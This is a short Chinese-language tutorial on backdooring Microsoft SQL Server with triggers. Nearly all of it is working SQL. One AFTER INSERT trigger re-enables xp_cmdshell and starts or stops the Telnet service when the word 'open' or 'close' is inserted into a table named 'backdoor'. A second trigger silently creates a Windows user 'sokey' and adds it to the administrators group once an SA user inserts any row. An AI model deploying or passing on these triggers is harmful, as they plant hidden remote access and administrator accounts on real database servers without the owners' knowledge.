1.创建一个表
create table backdoor
(LASTNAME varchar(10),FIRSTNAME varchar(10))
2创建一个后触发器,当输入字符串在字段中等于open的时候开启TELNET,为CLOSE时候关闭TELNET.
CREATE TRIGGER TR_HACKER2 ON backdoor
AFTER INSERT
AS
BEGIN
DECLARE @P VARCHAR(50)
SELECT @P=(SELECT LASTNAME FROM INSERTED)
EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
IF(@P LIKE '%OPEN%')
EXECUTE MASTER.DBO.XP_CMDSHELL 'NET START TELNET'
ELSE IF(@P LIKE '%CLOSE%')
EXECUTE MASTER.DBO.XP_CMDSHELL 'NET STOP TELNET'
END
3插入字符.这里没有启动的原因是因为我匹配的字符串时LASTNAME等于open,别的字符都不行的
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES('111','open')
4插入字符
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES('open','111')
触发器提升权限
普通用户提升系统权限
1.创建一个表
create table backdoor
(LASTNAME varchar(10),FIRSTNAME varchar(10))
2.创建一个触发器,当有任何字符输入到这个表当中在系统中建立超级用户
create TRIGGER TR_HACKER1 ON backdoor
AFTER INSERT
AS
BEGIN
EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
EXECUTE MASTER.DBO.XP_CMDSHELL 'net user sokey 123456 /add'
EXECUTE MASTER.DBO.XP_CMDSHELL 'net localgroup administrators sokey /add'
end
现在只等SA来登录并且输入任何字符,一般数据库为了保证安全有两个用户来管理
3插入字符(SA)
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES('open','111')